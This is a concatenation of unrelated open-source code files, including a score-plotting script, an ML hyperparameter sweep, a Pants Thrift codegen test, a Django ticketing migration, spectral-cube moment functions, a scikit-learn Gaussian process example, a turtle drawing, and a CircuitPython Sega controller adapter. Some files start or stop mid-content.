self.score_csv_ext_path = ".csv"
self.scores_list = [[] for k in range(self.nb_runs)]
self.scores_lengths = [[] for k in range(self.nb_runs)]
self.scores_average_step = []
self.max_length = 0
self.min_length = 0
def make_score_analysis(self):
for i in range(self.nb_runs):
self.get_score_data(i+1)
self.max_length = max(self.scores_lengths)
self.min_length = min(self.scores_lengths)
self.complete_score_datas()
self.scores_average_step = [[] for k in range(self.max_length)]
for j in range (self.max_length):
sum_at_step = 0
for i in range(self.nb_runs):
sum_at_step += self.scores_list[i][j]
self.scores_average_step[j] = sum_at_step/self.nb_runs
avg_score_step_plot_title = "Average score per step over " + str(self.nb_runs) + " runs"
avg_score_step_x_label = "Step"
avg_score_step_y_label = "Average score"
avg_score_step_output_path = "./average_score_step.png"
self.save_list_png(avg_score_step_output_path, self.scores_average_step, avg_score_step_x_label, avg_score_step_y_label, avg_score_step_plot_title)
def get_score_data(self, it):
# Open score file and put it into the scores_list
file_name = self.score_csv_root_path + str(it) + self.score_csv_ext_path
with open(file_name, "r") as scores:
reader = csv.reader(scores)
data = list(reader)
self.scores_lengths[it-1] = len(data)
for i in range(0, len(data)):
self.scores_list[it-1].append(int(data[i][0]))
def complete_score_datas(self):
# Complete score datas until they reach max length with the mean of the last 25
for i in range(len(self.scores_list)):
while len(self.scores_list[i]) < self.max_length:
avg_last_25 = sum(self.scores_list[i][-25:])/25
self.scores_list[i].append(avg_last_25)
def save_list_png(self, output_path, y, x_label, y_label, plot_title):
x = range(len(y))
plt.subplots()
plt.plot(x, y, label="average score per step")
plt.title(plot_title)
plt.xlabel(x_label)
plt.ylabel(y_label)
plt.savefig(output_path, bbox_inches="tight")
plt.close()
if __name__ == "__main__":
score_analyst = ScoreAnalyst(NUMBER_RUNS)
score_analyst.make_score_analysis()
|
the-stack_106_30540 | import copy
import numpy as np
import random as r
import training
params = {}
# settings related to dataset
params['data_name'] = 'SIR'
params['len_time'] = 257
n = 3 # dimension of system (and input layer)
num_initial_conditions = 5000 # per training file
params['delta_t'] = 0.02
# settings related to saving results
params['folder_name'] = 'exp2'
# settings related to network architecture
params['num_real'] = 0
params['num_complex_pairs'] = 1
params['num_evals'] = 2
k = params['num_evals'] # dimension of y-coordinates
# defaults related to initialization of parameters
params['dist_weights'] = 'dl'
params['dist_weights_omega'] = 'dl'
# settings related to loss function
params['num_shifts'] = 30
params['num_shifts_middle'] = params['len_time'] - 1
max_shifts = max(params['num_shifts'], params['num_shifts_middle'])
num_examples = num_initial_conditions * (params['len_time'] - max_shifts)
params['recon_lam'] = .001
params['L1_lam'] = 0.0
params['auto_first'] = 1
# settings related to training
params['num_passes_per_file'] = 1542#15 * 6 * 50
params['num_steps_per_batch'] = 2
params['learning_rate'] = 10 ** (-3)
# settings related to timing
params['max_time'] = 6 * 60 * 60 # 6 hours
params['min_5min'] = .25
params['min_20min'] = .02
params['min_40min'] = .002
params['min_1hr'] = .0002
params['min_2hr'] = .00002
params['min_3hr'] = .000004
params['min_4hr'] = .0000005
params['min_halfway'] = 1
# settings related to LSTM
params['num_LSTM_input_weights'] = 1
params['num_LSTM_hidden_weights'] = 1
params['LSTM_widths'] = [50]
for count in range(200): # loop to do random experiments
params['data_train_len'] = 2 #r.randint(3, 6)
params['batch_size'] = int(2 ** 2)#(r.randint(7, 9)))
steps_to_see_all = num_examples / params['batch_size']
params['num_steps_per_file_pass'] = (int(steps_to_see_all) + 1) * params['num_steps_per_batch']
params['L2_lam'] = 10 ** (-r.randint(13, 14))
params['Linf_lam'] = 10 ** (-r.randint(7, 10))
d = r.randint(1, 2)
if d == 1:
wopts = np.arange(100, 200, 5)
w = wopts[r.randint(0, len(wopts) - 1)]
params['widths'] = [n, w, k, k, w, n]
elif d == 2:
wopts = np.arange(30, 90, 5)
w = wopts[r.randint(0, len(wopts) - 1)]
params['widths'] = [n, w, w, k, k, w, w, n]
do = r.randint(1, 2)
if do == 1:
wopts = np.arange(140, 190, 5)
wo = wopts[r.randint(0, len(wopts) - 1)]
params['hidden_widths_omega'] = [wo, ]
elif do == 2:
wopts = np.arange(10, 55, 5)
wo = wopts[r.randint(0, len(wopts) - 1)]
params['hidden_widths_omega'] = [wo, wo]
training.main_exp(copy.deepcopy(params))
|
the-stack_106_30543 | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import os
import subprocess
from pathlib import Path
from textwrap import dedent
from pex.resolver import resolve
from pants.backend.codegen.thrift.lib.thrift import Thrift
from pants.backend.codegen.thrift.python.apache_thrift_py_gen import ApacheThriftPyGen
from pants.backend.codegen.thrift.python.python_thrift_library import PythonThriftLibrary
from pants.backend.python.interpreter_cache import PythonInterpreterCache
from pants.backend.python.subsystems.python_repos import PythonRepos
from pants.backend.python.targets.python_library import PythonLibrary
from pants.base.build_environment import get_buildroot
from pants.testutil.subsystem.util import global_subsystem_instance
from pants.testutil.task_test_base import TaskTestBase
class ApacheThriftPyGenTest(TaskTestBase):
@classmethod
def task_type(cls):
return ApacheThriftPyGen
@staticmethod
def get_thrift_version(apache_thrift_gen):
thrift = global_subsystem_instance(Thrift).scoped_instance(apache_thrift_gen)
return thrift.get_options().version
def generate_single_thrift_target(self, python_thrift_library):
context = self.context(target_roots=[python_thrift_library])
apache_thrift_gen = self.create_task(context)
apache_thrift_gen.execute()
def is_synthetic_python_library(target):
return isinstance(target, PythonLibrary) and target.is_synthetic
synthetic_targets = context.targets(predicate=is_synthetic_python_library)
self.assertEqual(1, len(synthetic_targets))
return apache_thrift_gen, synthetic_targets[0]
def init_py_path(self, target, package_rel_dir):
return os.path.join(self.build_root, target.target_base, package_rel_dir, '__init__.py')
def assert_ns_package(self, target, package_rel_dir):
with open(self.init_py_path(target, package_rel_dir), 'r') as fp:
self.assertEqual("__import__('pkg_resources').declare_namespace(__name__)",
fp.read().strip())
def assert_leaf_package(self, target, package_rel_dir, *services):
# We know thrift controls exported package symbols using `__all__`; so reading this out of the
# `__init__.py` is enough to show we haven't trampled non-trivial thrift-generated `__init__.py`
# files.
symbols = {}
with open(self.init_py_path(target, package_rel_dir), 'rb') as fp:
exec(fp.read(), symbols)
self.assertIn('__all__', symbols)
self.assertEqual(sorted(('constants', 'ttypes') + services), sorted(symbols['__all__']))
def test_single_namespace(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
const i32 THINGCONSTANT = 42
struct Thing {}
service ThingService {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
self.assertEqual({'foo/__init__.py',
'foo/bar/__init__.py',
'foo/bar/ThingService-remote',
'foo/bar/ThingService.py',
'foo/bar/ttypes.py',
'foo/bar/constants.py'},
set(synthetic_target.sources_relative_to_source_root()))
self.assert_ns_package(synthetic_target, 'foo')
self.assert_leaf_package(synthetic_target, 'foo/bar', 'ThingService')
def test_inserts_unicode_header(self):
"""Test that the thrift compiler inserts utf-8 coding header."""
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
/**
* This comment has a unicode string: 🐈
* That is a cat, and it's used for testing purposes.
* When this is compiled, the thrift compiler should include the "coding=UTF-8".
* at the beginning of the python file.
**/
struct Foo {
1: i64 id,
}(persisted='true')
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
for filepath in synthetic_target.sources_relative_to_buildroot():
if '__init__' not in filepath:
first_line = Path(get_buildroot(), filepath).read_text().splitlines()[0]
self.assertEqual(first_line, "# -*- coding: utf-8 -*-")
def test_nested_namespaces(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
struct One {}
"""))
self.create_file('src/thrift/com/foo/bar/two.thrift', contents=dedent("""
namespace py foo.bar.baz
struct Two {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift', 'bar/two.thrift'])
_, synthetic_target = self.generate_single_thrift_target(one)
self.assertEqual({'foo/__init__.py',
'foo/bar/__init__.py',
'foo/bar/constants.py',
'foo/bar/ttypes.py',
'foo/bar/baz/__init__.py',
'foo/bar/baz/constants.py',
'foo/bar/baz/ttypes.py'},
set(synthetic_target.sources_relative_to_source_root()))
self.assert_ns_package(synthetic_target, 'foo')
self.assert_leaf_package(synthetic_target, 'foo/bar')
self.assert_leaf_package(synthetic_target, 'foo/bar/baz')
def test_namespace_effective(self):
self.create_file('src/thrift/com/foo/one.thrift', contents=dedent("""
namespace py foo.bar
struct One {}
"""))
one = self.make_target(spec='src/thrift/com/foo:one',
target_type=PythonThriftLibrary,
sources=['one.thrift'])
apache_thrift_gen, synthetic_target_one = self.generate_single_thrift_target(one)
self.create_file('src/thrift2/com/foo/two.thrift', contents=dedent("""
namespace py foo.baz
struct Two {}
"""))
two = self.make_target(spec='src/thrift2/com/foo:two',
target_type=PythonThriftLibrary,
sources=['two.thrift'])
_, synthetic_target_two = self.generate_single_thrift_target(two)
# Confirm separate PYTHONPATH entries, which we need to test namespace packages.
self.assertNotEqual(synthetic_target_one.target_base, synthetic_target_two.target_base)
targets = (synthetic_target_one, synthetic_target_two)
self.context(for_subsystems=[PythonInterpreterCache, PythonRepos])
interpreter_cache = PythonInterpreterCache.global_instance()
python_repos = PythonRepos.global_instance()
interpreter = interpreter_cache.select_interpreter_for_targets(targets)
# We need setuptools to import namespace packages under python 2 (via pkg_resources), so we
# prime the PYTHONPATH with a known good version of setuptools.
# TODO(John Sirois): We really should be emitting setuptools in a
# `synthetic_target_extra_dependencies` override in `ApacheThriftPyGen`:
# https://github.com/pantsbuild/pants/issues/5975
pythonpath = [os.path.join(get_buildroot(), t.target_base) for t in targets]
for resolved_dist in resolve([f'thrift=={self.get_thrift_version(apache_thrift_gen)}',
'setuptools==40.6.3'],
interpreter=interpreter,
context=python_repos.get_network_context(),
fetchers=python_repos.get_fetchers()):
pythonpath.append(resolved_dist.distribution.location)
process = subprocess.Popen([interpreter.binary,
'-c',
'from foo.bar.ttypes import One; from foo.baz.ttypes import Two'],
env={'PYTHONPATH': os.pathsep.join(pythonpath)},
stderr=subprocess.PIPE)
_, stderr = process.communicate()
self.assertEqual(0, process.returncode, stderr)
def test_compatibility_passthrough(self):
py2_thrift_library = self.make_target(spec='src/thrift/com/foo:py2',
target_type=PythonThriftLibrary,
sources=[],
compatibility=['CPython>=2.7,<3'])
_, py2_synthetic_target = self.generate_single_thrift_target(py2_thrift_library)
self.assertEqual(py2_thrift_library.compatibility, py2_synthetic_target.compatibility)
py3_thrift_library = self.make_target(spec='src/thrift/com/foo:py3',
target_type=PythonThriftLibrary,
sources=[],
compatibility=['CPython>=3,<3.7'])
_, py3_synthetic_target = self.generate_single_thrift_target(py3_thrift_library)
self.assertEqual(py3_thrift_library.compatibility, py3_synthetic_target.compatibility)
self.assertNotEqual(py3_synthetic_target.compatibility, py2_synthetic_target.compatibility)
|
the-stack_106_30547 | # -*- coding: utf-8 -*-
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
('core', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Batch',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('create_time', models.DateTimeField(auto_now=True)),
('delivery_time', models.DateTimeField(null=True, blank=True)),
],
options={
'verbose_name': 'toimituser\xe4',
'verbose_name_plural': 'toimituser\xe4t',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Customer',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('first_name', models.CharField(max_length=100, verbose_name='Etunimi')),
('last_name', models.CharField(max_length=100, verbose_name='Sukunimi')),
('address', models.CharField(max_length=200, verbose_name='Katuosoite')),
('zip_code', models.CharField(max_length=5, verbose_name='Postinumero')),
('city', models.CharField(max_length=30, verbose_name='Postitoimipaikka')),
('email', models.EmailField(help_text='Tarkista s\xe4hk\xf6postiosoite huolellisesti. Tilausvahvistus sek\xe4 mahdolliset s\xe4hk\xf6iset liput l\xe4hetet\xe4\xe4n t\xe4h\xe4n s\xe4hk\xf6postiosoitteeseen.', max_length=75, verbose_name='S\xe4hk\xf6postiosoite')),
('allow_marketing_email', models.BooleanField(default=True, verbose_name='Minulle saa l\xe4hett\xe4\xe4 Traconiin liittyvi\xe4 tiedotteita s\xe4hk\xf6postitse')),
('phone_number', models.CharField(max_length=30, null=True, verbose_name='Puhelinnumero', blank=True)),
],
options={
'verbose_name': 'asiakas',
'verbose_name_plural': 'asiakkaat',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='LimitGroup',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('description', models.CharField(max_length=255, verbose_name='Kuvaus')),
('limit', models.IntegerField(verbose_name='Enimm\xe4ism\xe4\xe4r\xe4')),
],
options={
'verbose_name': 'loppuunmyyntiryhm\xe4',
'verbose_name_plural': 'loppuunmyyntiryhm\xe4t',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('start_time', models.DateTimeField(auto_now_add=True)),
('confirm_time', models.DateTimeField(null=True, verbose_name='Tilausaika', blank=True)),
('ip_address', models.CharField(max_length=15, null=True, verbose_name='Tilaajan IP-osoite', blank=True)),
('payment_date', models.DateField(null=True, verbose_name='Maksup\xe4iv\xe4', blank=True)),
('cancellation_time', models.DateTimeField(null=True, verbose_name='Peruutusaika', blank=True)),
('reference_number', models.CharField(max_length=31, verbose_name='Viitenumero', blank=True)),
('batch', models.ForeignKey(verbose_name='Toimituser\xe4', blank=True, to='tickets.Batch', null=True)),
('customer', models.OneToOneField(null=True, blank=True, to='tickets.Customer')),
],
options={
'verbose_name': 'tilaus',
'verbose_name_plural': 'tilaukset',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OrderProduct',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('count', models.IntegerField(default=0)),
('order', models.ForeignKey(related_name='order_product_set', to='tickets.Order')),
],
options={
'verbose_name': 'tilausrivi',
'verbose_name_plural': 'tilausrivit',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=100)),
('internal_description', models.CharField(max_length=255, null=True, blank=True)),
('description', models.TextField()),
('mail_description', models.TextField(null=True, blank=True)),
('price_cents', models.IntegerField()),
('requires_shipping', models.BooleanField(default=True)),
('electronic_ticket', models.BooleanField(default=False)),
('available', models.BooleanField(default=True)),
('notify_email', models.CharField(max_length=100, null=True, blank=True)),
('ordering', models.IntegerField(default=0)),
],
options={
'verbose_name': 'tuote',
'verbose_name_plural': 'tuotteet',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='TicketsEventMeta',
fields=[
('event', models.OneToOneField(related_name='ticketseventmeta', primary_key=True, serialize=False, to='core.Event')),
('shipping_and_handling_cents', models.IntegerField(default=0, verbose_name='Toimituskulut (senttej\xe4)')),
('due_days', models.IntegerField(default=14, verbose_name='Maksuaika (p\xe4ivi\xe4)')),
('ticket_sales_starts', models.DateTimeField(null=True, verbose_name='Lipunmyynnin alkuaika', blank=True)),
('ticket_sales_ends', models.DateTimeField(null=True, verbose_name='Lipunmyynnin p\xe4\xe4ttymisaika', blank=True)),
('reference_number_template', models.CharField(default='{:04d}', help_text='Paikkamerkin {} kohdalle sijoitetaan tilauksen numero. Nollilla t\xe4ytt\xe4minen esim. {:04d} (4 merkin leveydelt\xe4).', max_length=31, verbose_name='Viitenumeron formaatti')),
('contact_email', models.CharField(help_text='Ongelmatilanteissa k\xe4ytt\xe4j\xe4\xe4 kehotetaan ottamaan yhteytt\xe4 t\xe4h\xe4n osoitteeseen. Muoto: Tracon 9 -lipunmyynti <[email protected]>', max_length=255, verbose_name='Asiakaspalvelun s\xe4hk\xf6postiosoite selitteineen', blank=True)),
('plain_contact_email', models.CharField(help_text='Ongelmatilanteissa k\xe4ytt\xe4j\xe4\xe4 kehotetaan ottamaan yhteytt\xe4 t\xe4h\xe4n osoitteeseen. Muoto: [email protected]', max_length=255, verbose_name='Asiakaspalvelun s\xe4hk\xf6postiosoite ilman selitett\xe4', blank=True)),
('ticket_spam_email', models.CharField(help_text='Kaikki j\xe4rjestelm\xe4n l\xe4hett\xe4m\xe4t s\xe4hk\xf6postiviestit l\xe4hetet\xe4\xe4n my\xf6s t\xe4h\xe4n osoitteeseen.', max_length=255, verbose_name='Tarkkailus\xe4hk\xf6posti', blank=True)),
('reservation_seconds', models.IntegerField(default=1800, help_text='K\xe4ytt\xe4j\xe4ll\xe4 on t\xe4m\xe4n verran aikaa siirty\xe4 maksamaan ja maksaa tilauksensa tai tilaus perutaan.', verbose_name='Varausaika (sekuntia)')),
('ticket_free_text', models.TextField(help_text='T\xe4m\xe4 teksti tulostetaan E-lippuun.', verbose_name='E-lipun teksti', blank=True)),
('admin_group', models.ForeignKey(to='auth.Group')),
],
options={
'verbose_name': 'tapahtuman lipunmyyntiasetukset',
'verbose_name_plural': 'tapahtuman lipunmyyntiasetukset',
},
bases=(models.Model,),
),
migrations.AddField(
model_name='product',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='product',
name='limit_groups',
field=models.ManyToManyField(to='tickets.LimitGroup', blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='orderproduct',
name='product',
field=models.ForeignKey(related_name='order_product_set', to='tickets.Product'),
preserve_default=True,
),
migrations.AddField(
model_name='order',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='limitgroup',
name='event',
field=models.ForeignKey(verbose_name='Tapahtuma', to='core.Event'),
preserve_default=True,
),
migrations.AddField(
model_name='batch',
name='event',
field=models.ForeignKey(to='core.Event'),
preserve_default=True,
),
]
|
the-stack_106_30550 | from __future__ import print_function, absolute_import, division
import numpy as np
from .cube_utils import iterator_strategy
from .np_compat import allbadtonan
"""
Functions to compute moment maps in a variety of ways
"""
def _moment_shp(cube, axis):
"""
Return the shape of the moment map
Parameters
-----------
cube : SpectralCube
The cube to collapse
axis : int
The axis to collapse along (numpy convention)
Returns
-------
ny, nx
"""
return cube.shape[:axis] + cube.shape[axis + 1:]
def _slice0(cube, axis):
"""
0th moment along an axis, calculated slicewise
Parameters
----------
cube : SpectralCube
axis : int
Returns
-------
moment0 : array
"""
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
valid = np.zeros(shp, dtype=np.bool)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=np.nan, view=tuple(view))
valid |= np.isfinite(plane)
result += np.nan_to_num(plane) * cube._pix_size_slice(axis)
result[~valid] = np.nan
return result
def _slice1(cube, axis):
"""
1st moment along an axis, calculated slicewise
Parameters
----------
cube : SpectralCube
axis : int
Returns
-------
moment1 : array
"""
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
pix_size = cube._pix_size_slice(axis)
pix_cen = cube._pix_cen()[axis]
weights = np.zeros(shp)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=0, view=tuple(view))
result += (plane *
pix_cen[tuple(view)] *
pix_size)
weights += plane * pix_size
return result / weights
def moment_slicewise(cube, order, axis):
"""
Compute moments by accumulating the result 1 slice at a time
"""
if order == 0:
return _slice0(cube, axis)
if order == 1:
return _slice1(cube, axis)
shp = _moment_shp(cube, axis)
result = np.zeros(shp)
view = [slice(None)] * 3
pix_size = cube._pix_size_slice(axis)
pix_cen = cube._pix_cen()[axis]
weights = np.zeros(shp)
# would be nice to get mom1 and momn in single pass over data
# possible for mom2, not sure about general case
mom1 = _slice1(cube, axis)
for i in range(cube.shape[axis]):
view[axis] = i
plane = cube._get_filled_data(fill=0, view=tuple(view))
result += (plane *
(pix_cen[tuple(view)] - mom1) ** order *
pix_size)
weights += plane * pix_size
return (result / weights)
def moment_raywise(cube, order, axis):
"""
Compute moments by accumulating the answer one ray at a time
"""
shp = _moment_shp(cube, axis)
out = np.zeros(shp) * np.nan
pix_cen = cube._pix_cen()[axis]
pix_size = cube._pix_size_slice(axis)
for x, y, slc in cube._iter_rays(axis):
# the intensity, i.e. the weights
include = cube._mask.include(data=cube._data, wcs=cube._wcs, view=slc,
wcs_tolerance=cube._wcs_tolerance)
if not include.any():
continue
data = cube.flattened(slc).value * pix_size
if order == 0:
out[x, y] = data.sum()
continue
order1 = (data * pix_cen[slc][include]).sum() / data.sum()
if order == 1:
out[x, y] = order1
continue
ordern = (data * (pix_cen[slc][include] - order1) ** order).sum()
ordern /= data.sum()
out[x, y] = ordern
return out
def moment_cubewise(cube, order, axis):
"""
Compute the moments by working with the entire data at once
"""
pix_cen = cube._pix_cen()[axis]
data = cube._get_filled_data() * cube._pix_size_slice(axis)
if order == 0:
return allbadtonan(np.nansum)(data, axis=axis)
if order == 1:
return (np.nansum(data * pix_cen, axis=axis) /
np.nansum(data, axis=axis))
else:
mom1 = moment_cubewise(cube, 1, axis)
# insert an axis so it broadcasts properly
shp = list(_moment_shp(cube, axis))
shp.insert(axis, 1)
mom1 = mom1.reshape(shp)
return (np.nansum(data * (pix_cen - mom1) ** order, axis=axis) /
np.nansum(data, axis=axis))
def moment_auto(cube, order, axis):
"""
Build a moment map, choosing a strategy to balance speed and memory.
"""
strategy = dict(cube=moment_cubewise, ray=moment_raywise,
slice=moment_slicewise)
return strategy[iterator_strategy(cube, axis)](cube, order, axis)
|
the-stack_106_30552 | """
=============================================================
Gaussian process regression (GPR) with noise-level estimation
=============================================================
This example shows the ability of the
:class:`~sklearn.gaussian_process.kernels.WhiteKernel` to estimate the noise
level in the data. Moreover, we show the importance of kernel hyperparameters
initialization.
"""
# Authors: Jan Hendrik Metzen <[email protected]>
# Guillaume Lemaitre <[email protected]>
# License: BSD 3 clause
# %%
# Data generation
# ---------------
#
# We will work in a setting where `X` will contain a single feature. We create a
# function that will generate the target to be predicted. We will add an
# option to add some noise to the generated target.
import numpy as np
def target_generator(X, add_noise=False):
target = 0.5 + np.sin(3 * X)
if add_noise:
rng = np.random.RandomState(1)
target += rng.normal(0, 0.3, size=target.shape)
return target.squeeze()
# %%
# Let's have a look to the target generator where we will not add any noise to
# observe the signal that we would like to predict.
X = np.linspace(0, 5, num=30).reshape(-1, 1)
y = target_generator(X, add_noise=False)
# %%
import matplotlib.pyplot as plt
plt.plot(X, y, label="Expected signal")
plt.legend()
plt.xlabel("X")
_ = plt.ylabel("y")
# %%
# The target is transforming the input `X` using a sine function. Now, we will
# generate few noisy training samples. To illustrate the noise level, we will
# plot the true signal together with the noisy training samples.
rng = np.random.RandomState(0)
X_train = rng.uniform(0, 5, size=20).reshape(-1, 1)
y_train = target_generator(X_train, add_noise=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(
x=X_train[:, 0],
y=y_train,
color="black",
alpha=0.4,
label="Observations",
)
plt.legend()
plt.xlabel("X")
_ = plt.ylabel("y")
# %%
# Optimisation of kernel hyperparameters in GPR
# ---------------------------------------------
#
# Now, we will create a
# :class:`~sklearn.gaussian_process.GaussianProcessRegressor`
# using an additive kernel adding a
# :class:`~sklearn.gaussian_process.kernels.RBF` and
# :class:`~sklearn.gaussian_process.kernels.WhiteKernel` kernels.
# The :class:`~sklearn.gaussian_process.kernels.WhiteKernel` is a kernel that
# will able to estimate the amount of noise present in the data while the
# :class:`~sklearn.gaussian_process.kernels.RBF` will serve at fitting the
# non-linearity between the data and the target.
#
# However, we will show that the hyperparameter space contains several local
# minima. It will highlights the importance of initial hyperparameter values.
#
# We will create a model using a kernel with a high noise level and a large
# length scale, which will explain all variations in the data by noise.
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import RBF, WhiteKernel
kernel = 1.0 * RBF(length_scale=1e1, length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(
noise_level=1, noise_level_bounds=(1e-5, 1e1)
)
gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)
gpr.fit(X_train, y_train)
y_mean, y_std = gpr.predict(X, return_std=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(x=X_train[:, 0], y=y_train, color="black", alpha=0.4, label="Observsations")
plt.errorbar(X, y_mean, y_std)
plt.legend()
plt.xlabel("X")
plt.ylabel("y")
_ = plt.title(
f"Initial: {kernel}\nOptimum: {gpr.kernel_}\nLog-Marginal-Likelihood: "
f"{gpr.log_marginal_likelihood(gpr.kernel_.theta)}",
fontsize=8,
)
# %%
# We see that the optimum kernel found still have a high noise level and
# an even larger length scale. Furthermore, we observe that the
# model does not provide faithful predictions.
#
# Now, we will initialize the
# :class:`~sklearn.gaussian_process.kernels.RBF` with a
# larger `length_scale` and the
# :class:`~sklearn.gaussian_process.kernels.WhiteKernel`
# with a smaller noise level lower bound.
kernel = 1.0 * RBF(length_scale=1e-1, length_scale_bounds=(1e-2, 1e3)) + WhiteKernel(
noise_level=1e-2, noise_level_bounds=(1e-10, 1e1)
)
gpr = GaussianProcessRegressor(kernel=kernel, alpha=0.0)
gpr.fit(X_train, y_train)
y_mean, y_std = gpr.predict(X, return_std=True)
# %%
plt.plot(X, y, label="Expected signal")
plt.scatter(x=X_train[:, 0], y=y_train, color="black", alpha=0.4, label="Observations")
plt.errorbar(X, y_mean, y_std)
plt.legend()
plt.xlabel("X")
plt.ylabel("y")
_ = plt.title(
f"Initial: {kernel}\nOptimum: {gpr.kernel_}\nLog-Marginal-Likelihood: "
f"{gpr.log_marginal_likelihood(gpr.kernel_.theta)}",
fontsize=8,
)
# %%
# First, we see that the model's predictions are more precise than the
# previous model's: this new model is able to estimate the noise-free
# functional relationship.
#
# Looking at the kernel hyperparameters, we see that the best combination found
# has a smaller noise level and shorter length scale than the first model.
#
# We can inspect the Log-Marginal-Likelihood (LML) of
# :class:`~sklearn.gaussian_process.GaussianProcessRegressor`
# for different hyperparameters to get a sense of the local minima.
from matplotlib.colors import LogNorm
length_scale = np.logspace(-2, 4, num=50)
noise_level = np.logspace(-2, 1, num=50)
length_scale_grid, noise_level_grid = np.meshgrid(length_scale, noise_level)
log_marginal_likelihood = [
gpr.log_marginal_likelihood(theta=np.log([0.36, scale, noise]))
for scale, noise in zip(length_scale_grid.ravel(), noise_level_grid.ravel())
]
log_marginal_likelihood = np.reshape(
log_marginal_likelihood, newshape=noise_level_grid.shape
)
# %%
vmin, vmax = (-log_marginal_likelihood).min(), 50
level = np.around(np.logspace(np.log10(vmin), np.log10(vmax), num=50), decimals=1)
plt.contour(
length_scale_grid,
noise_level_grid,
-log_marginal_likelihood,
levels=level,
norm=LogNorm(vmin=vmin, vmax=vmax),
)
plt.colorbar()
plt.xscale("log")
plt.yscale("log")
plt.xlabel("Length-scale")
plt.ylabel("Noise-level")
plt.title("Log-marginal-likelihood")
plt.show()
# %%
# We see that there are two local minima that correspond to the combination
# of hyperparameters previously found. Depending on the initial values for the
# hyperparameters, the gradient-based optimization might converge whether or
# not to the best model. It is thus important to repeat the optimization
# several times for different initializations.
|
the-stack_106_30553 | # Program to draw Spider Web using Turtle
import turtle
t = turtle.Pen()
colors=['red', 'blue', 'yellow', 'green', 'cyan', 'magenta']
turtle.bgcolor('black')
for i in range(190):
t.pencolor(colors[i%6])
t.width(2)
t.forward(i)
t.right(30)
|
the-stack_106_30554 | # code.py for PiPicoUSBSegaController - https://github.com/thinghacker/PiPicoUSBSegaController
#
# This is a very simple project to take a Raspbery Pi Pico and turn it USB joystick adapter for a 3 or 6 Button Sega Genesis/Megadrive Controller using CircuitPython.
#
# References used while developing this:
# Circuit Python USB Gamepad concept - https://signal11.wordpress.com/tag/flight-simulation/
# Sega Controller State Machine - https://www.raspberryfield.life/2019/03/25/sega-mega-drive-genesis-6-button-xyz-controller/
# HID Descriptor for 8 Buttons and Dpad from an arduino pro micro version of this - https://github.com/thinghacker/DualUSBSegaController/blob/master/examples/DualUSBSegaController/DualUSBSegaController.ino
#
# Wiring Details (Uses a 2x5 connector that connects to 10 pin Ribbon Cable Connector Adapter that presents a DB9 male connector
#
#|Pico Pin | Pico Signal | 2x5 / DB9 Pin | Sega Signal | Wire Colour |
#|---------|-------------|---------------|--------------|-------------|
#| 40 | VBUS | 5 | +5V | Red |
#| 38 | GND | 5 | GND | Black |
#| 34 | GP28 | 7 | Select | Brown |
#| 32 | GP27 | 1 | Up / Z | Orange |
#| 31 | GP26 | 2 | Down / Y | Yellow |
#| 29 | GP22 | 3 | Left / X | Green |
#| 27 | GP21 | 4 | Right / Mode | Blue |
#| 26 | GP20 | 6 | B / A | Purple |
#| 25 | GP19 | 9 | C / Start | Grey |
import board
import digitalio
import time
import usb_hid
from adafruit_hid import find_device
controllerpins_in = {
"up_z": digitalio.DigitalInOut(board.GP27),
"down_y": digitalio.DigitalInOut(board.GP26),
"left_x": digitalio.DigitalInOut(board.GP22),
"right_mode": digitalio.DigitalInOut(board.GP21),
"a_b": digitalio.DigitalInOut(board.GP20),
"c_start": digitalio.DigitalInOut(board.GP19),
}
controllerpins_out = {"select": digitalio.DigitalInOut(board.GP28)}
# set the state for the input pins and enable built in pullups
for pin, pinio in controllerpins_in.items():
pinio.direction = digitalio.Direction.INPUT
pinio.pull = digitalio.Pull.UP
# set the state for the ouput pins and set the initial state
for pin, pinio in controllerpins_out.items():
pinio.direction = digitalio.Direction.OUTPUT
pinio.value = True
class Stick:
"""Stick
Used to reference the USB HID joystick defined in boot.py and for sending USB reports
"""
